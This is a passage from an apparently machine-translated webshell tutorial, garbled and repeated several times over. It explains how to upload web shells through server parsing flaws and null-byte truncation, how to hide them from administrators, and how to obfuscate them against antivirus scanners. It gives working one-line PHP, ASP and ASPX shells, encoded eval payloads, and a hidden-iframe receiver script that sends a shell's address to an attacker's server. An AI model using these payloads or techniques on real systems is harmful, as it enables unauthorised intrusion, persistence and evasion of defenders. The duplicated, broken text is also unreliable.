end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
= "1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
1
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
1
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one
The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and
Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.
Then use the frame to mount the horse:
Default
1
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request .ServerVariables
("HTTP_Referer")setfs
=server.
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1
url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
When the web server turns on fast-CGI, upload the image xx.jpg. The content is:
Default
|
1
|
fputs(fopen('shell.php', 'w' ),'eval($_POST[shell])?>');?> |
The fput used here creates a shell.php file and writes a sentence. Accessing the path xx.jpg/.php will generate a one-sentence Trojan shell.php in this path. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Locale: PHP, prel, Bourne Shell, C and other languages.
(5) Apache parsing vulnerabilityThe way Apache parses is from right to left. If the parsing cannot be successful, it will want to move one to the left. However, background upload usually looks at the rightmost suffix of the uploaded file, so according to For this, you can name the horse xx.php.rar, because apache cannot parse rar, so it parses it as php, but the background upload point parses it as rar, thus bypassing the upload file suffix restriction 2. Truncate the upload
When uploading a picture, for example, name it 1.asp .jpg (there is a space after asp). When uploading, use NC or burpsuite to capture the form, and add %00 after the upload name asp (in burpsuite You can directly edit the HEX value in it. The HEX value of a space is 20. Change 20 to 00). If HEX is 00, it means truncation, and 20 means a space. If it means truncation, it means ignoring the JPG verification statement in the script and directly Upload ASP. 3. Backend database backup
In the backend management system of some enterprises, there is a function to back up the database (for example, Southern CMS has the function to back up the database). You can upload a picture that contains a Trojan sentence, or change it to jpg format, and then use the database backup function to back up the picture to asp and other content that can be parsed into script statement format, and then passed Trojans can be executed by accessing the web, but this method is very old. Now most cms have canceled or disabled this backup function. 4. Use database statements to upload
(1) mysql database into outfile
The premise of this method must be that the website has a corresponding injection point, and the current user must have upload permission, and there must be a current web page in The absolute path under the server. The method is to use joint query to import the one-sentence Trojan into a PHP file under the website, and then use the server to connect to the website. However, the conditions for the above method are too harsh and are rarely encountered. (2) Create a new table writing Trojan Some open source cms or self-made webshells will have database management functions. There are sql query functions in the database management functions. First use create table shell (codetext); create a name called shell The table contains a list called code and the type is text. Then use insert into shell(code) values('one sentence horse'). Here, the code column in the shell table is assigned the value of one sentence horse, and then through custom backup, back up the table as x.php;x and then It is parsed into php and then executed. This is not x.php; x must be parsed into php. Different web servers have different service programs and different filtering rules. Other methods may be used. (3)phpMyadmin setting errorphpMyadmin is a tool used to manage website databases, in which config.inc.php is its configuration file. When viewing the file, if $cfg['Servers'][$i ]['auth_type'] The value setting of the parameter is not set (the default is config), which means that no corresponding verification is done when logging in to the database. You can directly connect to the database, and in some versions of Mysql, the default login is as the root user. Log in (i.e. administrator), so logging in has the maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as a remote login user, create a table and then write the one-sentence Trojan into it. 3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading webshell, you must hide the webshell. The first purpose of hiding the webshell is to prevent the website administrator from discovering it and deleting it. The second purpose is to prevent other hackers from discovering this file and using it. (1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
1
c:>copy3.asp.C:aux.asp
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly. asp includes the statement: , fill in the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find
Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement:
Default
1
include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
This aaa The content of 1.php on is
Default
1
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer: auto_prepend_file =hehe.phpThen look at include_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website. ③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
= "1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
1
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
1
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one
The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and
Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.
Then use the frame to mount the horse:
Default
1
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request .ServerVariables
("HTTP_Referer")setfs
=server.
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1
url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
2. Truncate the upload
3. Backend database backup
4. Use database statements to upload
(1) mysql database into outfile
(2) Create a new table writing Trojan Some open source cms or self-made webshells will have database management functions. There are sql query functions in the database management functions. First use create table shell (codetext); create a name called shell The table contains a list called code and the type is text. Then use insert into shell(code) values('one sentence horse'). Here, the code column in the shell table is assigned the value of one sentence horse, and then through custom backup, back up the table as x.php;x and then It is parsed into php and then executed. This is not x.php; x must be parsed into php. Different web servers have different service programs and different filtering rules. Other methods may be used. (3)phpMyadmin setting errorphpMyadmin is a tool used to manage website databases, in which config.inc.php is its configuration file. When viewing the file, if $cfg['Servers'][$i ]['auth_type'] The value setting of the parameter is not set (the default is config), which means that no corresponding verification is done when logging in to the database. You can directly connect to the database, and in some versions of Mysql, the default login is as the root user. Log in (i.e. administrator), so logging in has the maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as a remote login user, create a table and then write the one-sentence Trojan into it. 3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading webshell, you must hide the webshell. The first purpose of hiding the webshell is to prevent the website administrator from discovering it and deleting it. The second purpose is to prevent other hackers from discovering this file and using it. (1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
1
c:>copy3.asp.C:aux.asp
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly. asp includes the statement: , fill in the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find
Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement:
Default
1
include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
This aaa The content of 1.php on is
Default
1
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer: auto_prepend_file =hehe.phpThen look at include_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website. ③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1
evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为
Default
1
eval(eval(request("brute"))%>
7. Malaysia’s anti-virus protection
(1) base4code encoding
Malaysia’s anti-virus protection can be compressed by compressing the Malaysian code, and then perform the base4 encryption algorithm after compression, and then add the Malaysian code at the end Add
Default
1
@eval(gzinflate (base64_decode($code)));
You can execute the script. Among them, the $code variable is used to store the base4 code. During execution, it is first decompressed by gzinflate and executed in eval. In fact, this cannot be truly protected from killing, as base4code and eval are still included in the signature list, and will also be killed when passing through the scanner. (2) ROT13 encoding (php)
str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass signature detection, for example. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.pngThe strrev function in the picture is used to reverse characters. In order to escape the detection of the signature, the characters are specially separated with '.' signs. The characters encrypted by the three str_rot13 in the picture are gzinflate, str_rot13, base64_decode in order, which is equivalent to triple encryption, and also avoids the two feature codes of gzinflate and base64_decode. But there is no avoiding str_rot13. It is possible that some anti-virus software will also use str_rot13 as a feature code. ROT13 becomes rotation 13, which means that the current character’s position value in the alphabet minus 13 is encrypted. Encrypt it twice and it will return to its original value. However, due to the fixed algorithm, the encryption strength is not strong. And the method of cracking is extremely simple, just encrypt one side. (3) Other encodings
Generally, anti-virus software and scanners will use signature codes to determine whether there are viruses. When doing anti-virus processing for Malaysian or small horses, or in one sentence, php or asp scripts are usually used. Encryption functions can be used to bypass scanners (such as base4, rot13, etc.), but I think you can write your own encryption algorithm, and then use your own encryption algorithm to encrypt script code to bypass some feature codes. You can use some ideas of encryption methods such as Caesar cipher and shift encryption, write an encryption algorithm, and then encrypt the script code. Then feature codes such as base4 and rot3 will disappear, or you can use homemade encryption directly without any trouble. The algorithm encrypts the signature and then decrypts it when used. You can also use key encryption algorithms such as DES and RSA. Generally, Malaysia will have a password login box. You can link the password of the login script with the decryption key, and it can be parsed only after entering the correct password. , on the one hand, it is to avoid detection by scanners and anti-virus software, and on the other hand, it is convenient. Even if this Malaysia is obtained by others, they cannot decrypt it and see the source code. 5. About the backdoor of webshell
Generally, the Malaysian downloaded online will have more or less backdoors. These backdoors directly lead to the website we downloaded being taken away by others, so the Malaysian downloaded online must first Check for backdoors. For example, the universal password here:
Default
1234567
end function
ifsession ( "hehe") ""then
ifrequest.form("pass")=userpassor request.form ("pass")
= "1111111" hThensession ( "hehe" ) = UserPassSS response.redirect urlelse
here
Default
1
request.form ("pass")=userpass
was originally used to verify the value of pass. If the entered pass value is equal to userpass, it means Verification is successful, but later
Default
1
orrequest. from(“pass”)=”1111111”
means if the entered pass value is 111111 1. You can also log in to Malaysia. Of course, this place can't be that simple. The original author can assign the userpass value to two and add one
The trigger condition for userpass change is triggered when he logs in (for example, if the login fails, the update of userpass value will be triggered), so that you can add a suffix, and
Moreover, the trigger condition code and the verification code are far apart and difficult to find. At this time, we need to analyze the Malaysian code line by line.
Then use the frame to mount the horse:
Default
1
iframe src=backdoor addresswidth=0height=0>/iframe >
In this place, set the link address width and height to 0, and the page will be hidden. The "backdoor address" inside points to your own script receiver, and finally you put the receiving script on a public network server you built. The receiving script is as follows:
Default
url
=Request .ServerVariables
("HTTP_Referer")setfs
=server.
CreateObject ("Scripting.FileSystemObject") setfile
=fs.OpenTextFile(server.MapPath("hehe.txt") ,8,True)
file.writelineurl file.closeset file=nothing
setfs=nothing
%>
where
Default
1
url=Request .ServerVariables("HTTP_Referer")
represents the requested character to the content, that is, the Malaysian url address, and then The url address is saved to the current hehe.txt of the directory.
To propose this kind of backdoor, you must first destroy the second type of password authentication in Malaysia, which is the master password. Delete the relevant function code, and then check to see if there is an ASP Malaysia page with a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
(3)phpMyadmin setting errorphpMyadmin is a tool used to manage website databases, in which config.inc.php is its configuration file. When viewing the file, if $cfg['Servers'][$i ]['auth_type'] The value setting of the parameter is not set (the default is config), which means that no corresponding verification is done when logging in to the database. You can directly connect to the database, and in some versions of Mysql, the default login is as the root user. Log in (i.e. administrator), so logging in has the maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as a remote login user, create a table and then write the one-sentence Trojan into it. 3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading webshell, you must hide the webshell. The first purpose of hiding the webshell is to prevent the website administrator from discovering it and deleting it. The second purpose is to prevent other hackers from discovering this file and using it. (1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
1
c:>copy3.asp.C:aux.asp
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
